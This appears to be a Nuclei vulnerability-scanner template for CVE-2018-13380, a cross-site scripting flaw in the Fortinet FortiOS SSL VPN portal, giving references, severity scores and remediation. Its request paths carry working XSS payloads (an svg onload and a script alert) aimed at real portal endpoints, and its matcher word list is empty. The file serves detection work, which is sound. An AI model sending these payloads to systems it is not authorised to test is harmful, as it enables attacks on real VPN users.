id: CVE-2018-13380

info:
  name: Fortinet FortiOS - Cross-Site Scripting
  author: shelld3v,AaronChen0
  severity: medium
  description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
  remediation: |
    Apply the latest security patches or updates provided by Fortinet to fix this vulnerability.
  reference:
    - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
    - https://fortiguard.com/advisory/FG-IR-18-383
    - https://fortiguard.com/advisory/FG-IR-20-230
    - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-13380
    cwe-id: CWE-79
    epss-score: 0.00122
    epss-percentile: 0.46301
    cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: fortinet
    product: fortios
  tags: cve,cve2018,fortios,xss,fortinet

http:
  - method: GET
    path:
      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
      - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - ""
          - ""
        condition: or

      - type: word
        part: header
        negative: true
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 490a00463044022079a2e291c05e8a13716356a8ee76352d87c9d4b0c8882e12f7a3d9b6d9e6cfbc0220353087d43b3509b7bd8b7252de4913c3176acfc44d15970ea07f4fbf78bbbc3d:922c64590222798bb761d5b6d8e72950